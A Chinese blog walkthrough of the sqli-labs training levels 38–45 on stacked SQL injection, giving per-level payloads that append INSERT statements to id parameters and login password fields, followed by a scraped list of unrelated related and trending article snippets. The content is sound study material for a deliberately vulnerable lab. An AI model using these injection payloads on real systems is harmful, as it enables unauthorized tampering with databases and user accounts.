目录

Less-38

Less-39

Less-40

Less-41

Less-42

Less-43

Less-44

Less-45

关于堆叠注入的简介前面已经介绍过了,可以参考:第三部分/page-3 Stacked injection 堆叠注入_m0_54899775的博客-CSDN博客

Less-38

源码:

         在执行 select 时的 sql 语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1可以直接构造如下的 payload:

?id=1';insert into users(id,username,password) values ('38','less38','hello')--+

查看数据库:

发现已经添加成功。

Less-39

源码:

和 less-38 的区别在于 sql 语句的不一样:SELECT * FROM users WHERE id=$id LIMIT 0,1
也就是数字型注入,我们可以构造以下的 payload:

?id=1;insert into users(id,username,password) values ('39','less39','111')--+

查看数据库:

已经插入了数据。

Less-40

源码:

         本关与前两关都是类似的,唯一的区别是sql语句不太一样,本关的 sql 语句为 SELECT * FROM users WHERE id=('$id') LIMIT 0,1。

我们可以构造以下的 payload:

?id=1');insert into users(id,username,password) values ('40','less40','111')--+

查看数据库:

添加数据成功。

Less-41

源码:

         此处与 less-39 是一致的,区别在于 41 错误不回显。所以我们称之为盲注。 我们可以构造以下的 payload:

?id=1;insert into users(id,username,password) values ('41','less41','111')--+

查看数据库:

发现账户及密码被添加成功。

Less-42

源码:

         Update 更新数据后,经过 mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化。在 select 调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。

Password 变量在 post 过程中,没有通过 mysql_real_escape_string()函数的处理。因此在登录的时候密码选项我们可以进行攻击。
        登录用户名随意
        密码登录用以下的方式:

ccc';insert into users(id,username,password) values ('42','less42','111')# 
       

注: 将type修改为任意字符是为了方便查看输入的信息,实际没什么作用。

显示登陆失败,查看数据库中数据:

发现数据是添加成功的。

Less-43

源码:

此关与Less-42关几乎相同,不同的是sql语句,因此这里Password处可以构造下面的payload:

ccc');insert into users(id,username,password) values ('43','less43','111')#

用户名随意。

注: 将type修改为任意字符是为了方便查看输入的信息,实际没什么作用。

显示登陆失败,这里进行数据库的查看:

发现用户名和密码也是添加成功的。

Less-44

源码:

本关是基于盲注的,这里盲注主要是要没有报错信息,所以要采用盲注。这关与 42 关的区别就在于没有报错信息,同时,我们使用同样方式的 payload:

cc11c';insert into users(id,username,password) values ('44','less44','111')#

用户名还是随意输入:

注: 将type修改为任意字符是为了方便查看输入的信息,实际没什么作用。

显示登陆失败,查看数据库:

发现用户名密码添加成功。

Less-45

源码:

同样的,45 关与 43 关的 payload 是一样的,只不过 45 关依旧没有报错信息。构造下面的payload:

用户名随意

Password:334');insert into users(id,username,password) values ('45','less45','111')#

显示登陆错误,查看数据库:

用户名和密码已经添加成功。

sqli-labs Less-38、39、40、41、42、43、44、45(sqli-labs闯关指南 38、39、40、41、42、43、44、45)—堆叠注入相关推荐

  1. sql-labs闯关38~45

    sql-labs闯关38~45: 友善爱国平等诚信民主友善爱国爱国友善平等诚信自由平等友善平等法治诚信民主民主 复习笔记1 内容: sql-labs第38关(GET请求-堆叠查询注入-字符型) sql ...

  2. SQL注入之堆叠注入(sql-lab第38关)

    什么是堆叠注入 在SQL中,分号(;)是用来表示一条SQL语句结束的.试想一下我们在分号结束一个SQL语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入.而堆叠注入可以执行的是任 ...

  3. 响应式设计时代,我们该如何设计网站? 发表于2013-05-25 11:44| 13874次阅读| 来源Smashing Magazine| 38 条评论| 作者Vasilis van Gemert

    响应式设计时代,我们该如何设计网站? 发表于 2013-05-25 11:44|  13874次阅读| 来源 Smashing Magazine|  38 条评论| 作者 Vasilis van Ge ...

  4. codecombat之边远地区的森林12-22关及地牢39关代码分享

    codecombat中国游戏网址:http://www.codecombat.cn/ 全部代码为javascript代码分享 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ...

  5. 交付效率提升40%,珍爱网基于微服务的DevOps落地指南

    2015-2016年,珍爱线下门店已新增覆盖城市9个,与此同时,CRM系统大小故障却发生了数十起... ... 珍爱网是以"网络征选+人工红娘"模式提供婚配服务的婚恋相亲平台.CR ...

  6. 高中数学40分怎么办_高二数学不会,准高三该怎么办?40分到高考140如何逆袭?...

    原标题:高二数学不会,准高三该怎么办?40分到高考140如何逆袭? 高二,这个年级是有点尴尬的,适应了高一的学习,感觉高二学习没有了动力,离高考还远,于是有些孩子就开始了放任自己,开始了放弃,殊不知高 ...

  7. 40岁老码农面试京东被淘汰,HR感叹:40岁混不到高管,都会被清退

    无论任何一个行业,都很少会在招聘的时候要一个年纪偏大的职员.特别是现在互联网的程序员,年过30如果还没实现财富自由的话,一边要面临的是即将被公司辞退的压力,另一边还要面临找不到工作无法养家糊口的压力. ...

  8. 38.6歌曲计算机,抖音最火的6首歌曲,38度6垫底,沙漠骆驼第二,第一百听不厌...

    随着短视频的火爆,间接也带火了不少好听的歌曲,下面小编就来带大家了解一下抖音目前最火的6首歌曲,抖音最火的6首歌,38度6垫底,沙漠骆驼第二,第一百听不厌! 六.38度6 记得有研究表明,当遇到一个人 ...

  9. 农家妹只身闯京城 5年开40家连锁店

    范永如,来自东北农村,19岁只身闯京城,仅用五年时间,在全国开起了40家饰品店,现在的范永如是个时尚的年轻老板,可是就在五年前,她却因为家里穷交不起学费而辍学.闲了半年以后,不甘心贫困的范永如决定出去 ...

最新文章

  1. Spring Boot 无侵入式 实现 API 接口统一 JSON 格式返回
  2. 节能无线信标Ver0:功率测试
  3. php+我的第一个程序,2. 第一个 C 程序
  4. 面试中经常出现的算法2(整理)
  5. we-rich 小程序渲染富文本js库
  6. 华为机试HJ99:自守数(附带提速方案)
  7. java的弱索引是什么_Java从零开始学 - 第76篇:什么是索引?
  8. 思科路由器常用配置命令大全
  9. 最新版WIN10安装教程(官方纯净版)(适用于新机以及旧机重装系统或升级系统)
  10. java——集合详解
  11. 加油站都需要什么手续_开一个加油站需要什么手续,需要多少启动资金?
  12. Xmanager远程桌面linux,Windows下通过Xmanager远程桌面控制Linux
  13. 计算机组装与维修(一)
  14. 仿QQ弹出窗口 gggggggggggg
  15. eNSP三层架构实验
  16. Python 调用微信公众号接口(RPA 项目 - 交互篇)
  17. Selenium IDE介绍
  18. 通过视线诱导技术提升公路隧道安全
  19. 解决docker下安装redis后,RedisDesktopManager可以链接,但是springboot项目不能链接的问题
  20. 新手安装WIN7与ubuntu双系统 安装记录

热门文章

  1. 国产CPU产业链的逻辑架构
  2. “流支付”掀起互联网支付创新浪潮,SAK支付白皮书揭秘
  3. (TPAMI 2020) Part-A^2 Net
  4. cpuz测试分数天梯图_联想Z5跑分实测 附高通骁龙636天梯图性能排名
  5. SpringBoot时区配置
  6. ts240 服务器信息,【ThinkServer TS240配置】ThinkServer TS240塔式服务器配置-ZOL中关村在线...
  7. Java校验XML文件
  8. python实现爬取非小号相关性(btc)数据
  9. 优步UBER司机全国各地奖励政策汇总 (4月4日-4月10日)
  10. 河南大学2019计算机专业录取分数线,2019河南大学本科录取分数线(含历年录取分数线)...